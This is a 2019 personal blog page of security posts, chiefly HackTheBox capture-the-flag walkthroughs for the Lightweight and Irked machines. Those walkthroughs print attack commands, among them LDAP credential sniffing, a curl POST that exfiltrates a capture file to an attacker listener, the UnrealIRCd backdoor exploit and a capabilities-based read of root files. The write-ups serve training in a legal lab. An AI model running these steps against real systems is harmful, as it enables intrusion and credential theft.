Friday, August 2, 2019

Post #26 - HackTheBox Write-Ups: Netmon & LaCasaDePapel

Hello! I'm sure you've noticed the blog has changed a bit. I'm still working on cleaning it, but hopefully the simplistic design will make it easier on the eyes!

I've been sick for a few weeks and was on vacation before that, so I actually wanted to drop a few lines letting everyone know that two more HackTheBox write-ups are live at 0x00sec: Netmon and LaCasa!

As always, I hope you enjoy! Leave me a comment here, reply to the forum thread, or hit me up on Twitter!

Stay safe out there!

Saturday, June 22, 2019

Post #25 - HackTheBox Write-Ups: Help & Querier

I made a mistake. Apparently, in all my rushing around to drop a HackTheBox write-up on 0x00sec a few weeks ago and then promote it via various channels, I didn't drop a post here as I normally do. Today, I intend to not only correct that mistake, but to drop a link to a second write-up that I just posted this weekend.

The first write-up was for Help. The second write-up was for Querier.

I hope you enjoy them. As always, follow me on Twitter or leave a comment here or on the article if you have any feedback or questions.

Thanks!

Saturday, May 11, 2019

Post #24 - HackTheBox Write-Up: Lightweight

And here we are again, yet another HackTheBox write-up. Once again this post is dropping directly on my blog because vict0ni took care of the 0x00sec write-up this week. Today, Lightweight is our target. We'll start, as we always do, with Nmap.

nmap -sC -sV -oA Lightweight 10.10.10.119

Explanations:

-sC - Script scanning using the default script list.

-sV - Attempts version detection of protocols/applications during scan.

-oA - Output files in all formats

Lightweight - The name of the files for -oA output.

10.10.10.119 - The target machine’s IP address.

We've got HTTP, SSH, and LDAP. Two of those services require credentials, so let's get started with some HTTP enumeration:

gobuster -u http://10.10.10.119 -w /usr/share/wordlists/dirb/small.txt -o Lightweight.gob.txt

Explanations:

-u - Specifies the URL to gobust.

-w - Specifies the wordlist to use for brute-forcing directories. I find that small.txt is a good, default starting point for me. If needed, I can work my way up to bigger wordlists, but it hasn’t been necessary for me up to this point.

-o - Specifies the ouput file name.

nikto -host 10.10.10.119 -port 80 -output Lightweight.nikto

Explanations:

-host - Specifies the target hostname/IP address.

-port - Specified the target port number.

-output - Specifies the output file name.

As it turns out, both of these attempts failed. I sometimes have issues with my OpenVPN connection to HackTheBox, and at the time I attempted this box my wireless equipment was slowly dying, so I reset everything, then browsed to the website to make sure my connection to HTTP was fine.

...and then I read the website.

So, we can't use any brute-forcing tools. Noted. We can at least peruse the site. While doing so, we eventually discover a page that explains how we can use our IP as an SSH username and password to access the box. Let's get connected and see what we can find.

We have next to no rights on this box other than to our own home directory. I tried some of the usual stops here, such as Linenum and pspy, but to no avail. I ended up connecting to LDAP with no credentials, which let me see a few things, including password hashes for ldapuser1 and ldapuser2. I tried cracking these with both john and and hashcat using rockyou.txt without success. I had to call in some major support from my teammates, and once again I learned another step I should be using in my investigation: packet captures.

Recall during our review of the machine that there is a certain page that let's us reset our password if needed. How could that take place? How could a webpage be reaching into the box to reset our password? Well, let's think about some of the protocols involved here. Of the protocols advertised, the one that deals with user accounts and their statuses, is LDAP. With that in mind, we can set up a packet capture on the victim using tcpdump:

tcpdump 'port 389' -s 65535 -w ldap.pcap

Explanations:

'port 389' - Specifies the port for which we want to capture packets.

-s 0 - Set the capture file size to maximum to ensure that it will not truncate.

-w ldap.pcap - Specifies the file to which we want to write our capture.

I let this run for a couple of minutes, then browsed to the reset page and allowed my password to be reset. Once again, I waited, this time for at least five minutes. Once done, I killed the capture. I transferred the .pcap file to my machine using scp (I was unable to successfully set up a reachable server on the victim machine). However, I also played around with another exfiltration technique that I thought I'd share; using POST requests with curl.

First, I set up a netcat listener on my attacking machine (you could set up a better HTTP server, specifically one that supports POST requests, which SimpleHTTPServer does not). I piped the output of this listener to a file:

nc -lp 2113 > ldap.pcap

Explanations:

-l - Listen mode.

-p 2113 - Specifies the port on which to listen.

Then, from the victim machine, I ran the below command:

curl -X POST -d @389.pcap http://10.10.14.41:2113/

Explanations:

-X - Specifies a request type.

POST - The request type for -X.

@389.pcap - The file to be posted, prepended with @.

Give the request a few moments to process, then kill your nc command. You can trim the file to edit out the HTTP portion of the request, or (and this works on the raw .pcap file, too) just run strings against the file and look for something interesting.

That's some awesome LDAP simple authentication bind info. What can we do with it, though? We can authenticate directly to LDAP, but our rights are no different than the non-authenticated session we had earlier. There has to be another angle.

I am embarrassed to say it, but this came down to some simple Linux knowledge of which I was not aware prior to this point. I've been using su for years, but I run most of my machines as root anyway (yes, I'm a terrible person, I know.) I was utterly unaware that su could be used to switch to any user account, but my wonderful backup squad at 0x00sec quickly corrected my knowledge gap. All that being said, I used su to switch to ldapuser2 with the simple password we captured in the authentication packet.

After all that work, we can finally grab the user flag. Once that's done, it's back to work.

If we take a look in the /home/ldapuser2 directory, we'll see a file named backup.7z. Once we've found this file, we can run file against it to confirm that it is, in fact, a .7z file.

I transfer the file to my machine to begin working on it. The first thing I do is try to unzip the file, but it is password-protected. A few quick Google searches (and some personal digging through memory) and I stumble upon 7z2hashcat.pl... which turns out to be irrelevant in this case.

I am not opposed to turning to the official HackTheBox forums in times of need, and a kind soul on there linked to bruteZip.sh.

bruteZip.sh backup.7z /usr/share/wordlists/dirb/small.txt

This tool did exactly the trick, and we now know the password for the archive:

Now we can extract the archive, and inside we find multitude of files. However, the file I am interested in is status.php. Why? Think about your experience when browsing the site on port 80. Was there any page that took longer to load than the others? For me, it was the blacklist page, status.php. Reviewing the source for this .php file, we locate the credentials for ldapuser1:

Once again we can use su to switch user. Now that we're closer to root, we can start enumerating with the usual tools, starting with Linenum. I get a copy of Linenum transferred to the victim machine, run chmod +x to grant executable rights, and execute it, sending output to Linenum.txt (if you so choose.)

I had to read the output file over and over and over again before learning yet another new thing: POSIX capabilities. Per the ArchWiki:

"Capabilities (POSIX 1003.1e, capabilities(7)) provide fine-grained control over superuser permissions, allowing use of the root user to be avoided. Software developers are encouraged to replace uses of the powerful setuid attribute in a system binary with a more minimal set of capabilities."

All that is to say we can abuse binaries with capabilities to gain elevated code execution. Let's look at our specific example, openssl.

Okay, but what can we do with it? That all depends on the binary. In this case, we can read the man page for openssl to look for something useful:

Per the man page, "Encoding and Cipher Commands: The following aliases provide convenient access to the most used encodings and ciphers." So, here's the command I want to try:

./openssl base64 -in /root/root.txt

NOTE: the ./ is important. You want to make sure you are calling the openssl binary in /home/ldapuser1, not the binary in PATH.

...And that looks successful. Let's decode it now by echoing the base64 output to base64 -d:

We have root, and that concludes our attack on Lightweight. There was a lot to think about here, and the pattern for escalation was a bit different, but overall I enjoyed this box.

See you again soon!

Tuesday, April 30, 2019

Post #23 - HackTheBox Write-Up: Irked

Welcome to another HackTheBox write-up! I'm posting the full write-up here on my blog instead of on 0x00sec because my compatriot vict0ni posted a nice write-up this time around.

This round's box was Irked. Let's attack.

As always, I kick off an Nmap:

nmap -sC -sV -oA Irked 10.10.10.117

Explanations:

-sC - Script scanning using the default script list.

-sV - Attempts version detection of protocols/applications during scan.

-oA - Output files in all formats

Irked - The name of the files for -oA output.

10.10.10.117 - The target machine’s IP address.

Here's what we got:

I don't have any creds for ssh, so I decide to visit the webpage first to get an idea what's going on with this box. Before I do that, though, I kick off my secondary Nmap scan:

nmap -p- -T3 -oA Irked.full 10.10.10.117

Explanations:

-p- - Scan all ports, not just most popular (this is the default behavior of Nmap).

-T3 - Timing control, where -T1 is paranoid and slow and -T5 is insane and fast. I figure -T3 is a good middle ground for HTB, although realistically it probably doesn’t matter.

We'll come back to this. For now, let's get some more tools running while we review the webpage:

gobuster -u http://10.10.10.117 -w /usr/share/wordlists/dirb/small.txt -o Irked.gob.txt

Explanations:

-u - Specifies the URL to gobust.

-w - Specifies the wordlist to use for brute-forcing directories. I find that small.txt is a good, default starting point for me. If needed, I can work my way up to bigger wordlists, but it hasn’t been necessary for me up to this point.

-o - Specifies the ouput file name.

nikto -host 10.10.10.117 -port 80 -output Irked.nikto

Explanations:

-host - Specifies the target hostname/IP address.

-port - Specified the target port number.

-output - Specifies the output file name.

Not much going on, so I visit the webpage in a browser.

Still not much happening there, either. I downloaded the image to search for metadata, but didn't find anything. The source of the page, while sparse, did provide us with the potential clue "IRC server coming soon!"

And as we return to our full Nmap scan, our confidence in this clue grows significantly:

We see IRC is running on TCP port 6697. I happen to have HexChat installed on my machine, so I load it up and connect to the IRC server. Upon connecting, I note the banner states the server is running Unreal IRC 3.2.8.1. I think it's time to consult searchsploit for possible exploits:

So there is a backdoor! Perfect! With that in mind, I prepare to fire up Metasploit, but before doing that I run searchsploit again to read the details of the exploit:

searchsploit -x exploits/linux/remote/16922.rb

This is not a very complicated exploit. Once we connect to the IRC server, we send AB;, which triggers the backdoor and allows us to execute code. We then execute our payload (in Metasploit we'll pick a reverse shell of some kind and set the payload option variable to that shell, but if we were exploiting manually we would literally just replace everything after AB; with our own code.)

With that in mind, let's get Metasploit armed and ready:

search unreal

use exploit/unix/irc/unreal_ircd_3281_backdoor

show options

set rhosts irked.htb

set rport 6697

show payloads

set payload cmd/unix/bind_perl

exploit

And we execute the exploit:

We're connected, but our shell is terrible. I spent a lot of time trying to poke at the things I thought I needed, but the limitations of the shell made it extremely difficult. As usual, the angel that is guly clued me in on a very standard trick for getting a better shell instantly:

python -c 'import pty; pty.spawn("/bin/bash")'

Explanations:

-c - Specifies that python should run the command inside the '' marks.

import pty - Tells python to import the pty module, which provides pseudo-terminal capabilities.

pty.spawn("/bin/bash") - Spawns a bash shell via pty.

Now we have a much better way of working with our foothold, so I start enumerating in earnest. It doesn't take long for me to spot the directory /home/djmardov/Documents. I am able to traverse into the directory, and I can see the user.txt file. However, I do not have permission to read it, so for now we'll leave it be. There is a hidden file named .backup that I am able to read.

Steganography. At last, my time has come. I know of only one thing that might hold something more than appeared at first glance; our irked.jpg file we grabbed from the webpage.

I chose to use steghide for this next part, and I ran it as follows (when prompted for the password, I provided UPupDOWNdownLRlrBAbaSSss):

steghide extract -sf irked.jpg

Explanations:

extract - Extract hidden data from the source file.

-sf - Specifies we are inputting a file that contains hidden data.

irked.jpg - The source file.

Once we've run the command, the file pass.txt is extracted. If we cat this file, we see a string

This might be our password, so knowing the directory we found it in, let's turn to ssh to see if we can authenticate and get another shell:

And now we've got a shell as djmardov. Let's grab our user flag, then start enumerating.

I spent an eternity on this box after this point. I learned a lot about enumeration. I used a combination of this resource and the venerable (though new to me at time of working on this box) Linenum and pspy.

For Linenum, I ran it and just piped the output to Linenum.txt. The same goes for pspy (though because pspy listens until terminated, I tend to run it for at least five minutes to ensure I capture any processes that recur on a scheduled basis). On this box I ran pspy32s (the smaller, 32-bit version of pspy.) Pictured below is the portion of output from Linenum that held the key to our root path, although I completely missed it because I am still a noob when it comes to Linux privesc.

I ran file on viewuser and confirmed it is an ELF. I read the contents of the file (you can do this with, in my preferred order, strings, xxd, less, or cat) and noted this interesting bit:

I don't recognize that file, but my guess was that if I placed it in the given directory, something would happen. I had to fuss around a bit and first tried just a text file with commands in it, but then realized I needed to add #!/bin/bash to it. Then I got access denied, so I ran chmod +x on it. You can add whatever you want to the file to get code execution as root; I selected a python reverse shell:

I fire up a netcat listener on my attacking machine, then run /usr/bin/viewusers. My shell connects, and I run whoami to confirm that I am root. I then upgrade my shell again with python -c 'import pty; pty.spawn("/bin/bash")' before navigating to and grabbing the root flag.

That's it for this box. I enjoyed it quite a bit, even if it humbled me and taught me once again that my biggest weakness (and probably the most important part of CTF if not offsec as a whole) is enumeration.

Thanks for reading!

Saturday, April 13, 2019

INFO: Coerchck V0.2

If you recall my post from six months ago, I released a PowerShell script called Coerchck for iterating through /24 subnets to list all local administrator accounts on Windows machines.

I finally released version 0.2 today after many hours of delayed work. Sadly, however, my home-brew subnet calculator is a still a little rough around the edges (a fact that weighs its shame heavily upon me, I assure you). Nevertheless, I wanted this tool available to not only myself but other security professionals who may find themselves in need of such a script. To that end I found a concise little function on TechNet with a license that would allow it to be added to my script.

Check out the updated repo here, and check out my explanatory post on 0x00sec.

Happy hunting!

Tuesday, April 2, 2019

Post #22 - HackTheBox Write-Up: Curling

Hello again!

I've posted another HackTheBox write-up; this round's box was Curling. You can find the box here, at 0x00sec.

As usual, drop me a comment here, on the forum post, or on Twitter.

See you soon with another box, and with an update to Coerchk!

Wednesday, March 13, 2019

Post #21 - HackTheBox Write-Up: Access

Greetings!

Still making minor tweaks to the blog that I will be uploading in the near future. I may also be moving to a new platform, but we'll see; I may just majorly overall the theme running on this blog.

Nevertheless, that is not why I am posting here today. I am, in fact, posting to link you to a write-up I did of a HackTheBox machine: Access. Access is not the first HTB machine I've pwned, but it is the first machine I've pwned that has since retired. As such, it became the first candidate for a write-up.

You can read the write-up over at 0x00sec, of which I am a member.

I hope you enjoy the write-up! Drop me a comment here, on the forum post, or on Twitter.

Thank you very much! Many exciting things ahead!